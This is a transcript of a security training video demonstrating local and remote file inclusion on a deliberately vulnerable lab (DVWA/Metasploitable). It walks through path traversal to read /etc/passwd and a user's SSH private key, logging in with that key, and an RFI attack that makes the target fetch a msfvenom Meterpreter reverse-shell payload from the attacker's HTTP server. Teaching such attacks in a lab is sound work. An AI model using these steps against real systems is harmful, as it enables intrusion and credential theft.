File Inclusion Demo

Time
18 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
So here we are on DVWA; here's the application. So I know it's Ubuntu, which means it's Linux, which means if I look for the /etc/passwd file, it will work. If I'm looking for a Windows file, it won't work, because this is not a Windows box. Also, we're looking at PHP and we're on Apache 2.2.8.
00:19
And I also know the version of PHP here.
00:23
So I can see this page parameter is including this include.php
00:29
file. Now
00:31
with LFI the ../ matters, because if I do this and it says /etc/passwd,
00:38
this might not work. So it really depends how far I go back. So you can just keep doing this manually.
00:44
Again, this might take a long time depending on how far back we go and
00:49
how the PHP was written.
00:52
But here we go.
00:53
So now we see the /etc/passwd file. So I'll view source and see how much nicer that is than in the slide.
01:02
So I'm looking for
01:03
the users. I see msfadmin,
01:07
and because I know how Linux is structured and I'm looking at the msfadmin user,
01:14
I'm gonna tack on at the end here,
01:18
instead of /etc/passwd,
01:23
/home/msfadmin, which is that user 1000,
01:27
/.ssh/id_rsa.
01:30
If they have their key misconfigured, I should be able to read it,
01:36
and I can see here that it is misconfigured
01:38
and I am able to view it. So now what do you do?
01:42
So again, I view source, I grab this key,
01:47
and what I'm gonna do
01:49
is I'm going to make my own key, msfadmin.
01:53
I'm going to paste that private key information into here.
01:57
Going to exit out of this. And you have to chmod this too; you can do 400
02:05
or 600.
02:07
Yeah.
02:07
And now what I should be able to do is ssh
02:10
Mhm.
02:12
msfadmin, and then give it the user on that box, msfadmin, which I did. So
02:17
now I'm on the box, because I used LFI to grab the SSH key.
02:23
That's great.
02:24
So let's exit out of here
02:27
and let me show you what happens with RFI, remote file inclusion. Now,
02:30
remember I need to be able to see if it can reach out to my server. So nc -lvp 4444,
02:38
and I'll go back and I'm going to change this
02:43
to my server, http://192.168.122.8:4444.
02:53
And I see here that the connection was received. It's not looking for any file in particular, so I can name my file whatever I want to.
03:00
I'm going to kill the connection here.
03:04
And what I'm gonna do is I'm going to create that shell.txt file
03:08
with msfvenom.
03:12
Now you'll notice the payload, php/meterpreter/reverse_tcp, with my host as well as the LHOST, and my LPORT is 4444,
03:22
and we're gonna make this into this .txt file.
03:24
Like I said, sometimes when you make it a PHP file, it will execute on your own server, and you're like, oh, this looks awfully familiar. Well, that's because it's your own server.
03:34
So the other thing to do is we want to set up Metasploit.
03:40
So, you know, I like to execute things directly from the terminal here
03:46
before actually loading Metasploit, the Metasploit Framework,
03:52
so I should have everything set up and ready to go.
04:03
So what I'll do now is I need to set up a server on my own machine.
04:10
So I'm gonna use Python 3,
04:12
an HTTP server.
04:15
And
04:17
I'm going to
04:23
change this now.
04:28
to http://
04:30
192.168.122.8:
04:33
8000, because that's where our server is running, on port 8000,
04:38
and shell.txt.
04:43
All right. That's on port 8000. That's why I chose that. And you can see that Meterpreter session is opened.
04:49
Mhm.
04:50
And I see there it is. So if I interact with it, sessions 1, sysinfo,
04:57
I see I'm on my Metasploitable here.
04:59
So that's how to leverage both: LFI to find valuable information, in this case an SSH key where we can SSH onto this machine,
05:08
or RFI, where we can host our own file and have the server reach out and execute our shell so that now we're on the box here.
05:19
So those are file inclusion vulnerabilities, and that's how to exploit them.